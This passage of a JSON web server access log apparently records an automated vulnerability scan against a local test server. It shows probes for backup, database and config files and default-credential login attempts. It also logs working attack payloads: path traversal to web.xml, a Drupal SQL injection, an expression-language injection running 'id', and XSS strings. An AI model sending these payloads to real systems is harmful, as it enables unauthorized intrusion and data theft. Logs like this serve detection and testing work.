"18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /telescope/requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"j_username=admin&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"j_username=app&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"j_username=mqadmin&j_password=mqadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Administrator\x0D\x0A Administrator\x0D\x0A bi\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/services/XMLPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=node&destination=node HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plesk-stat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 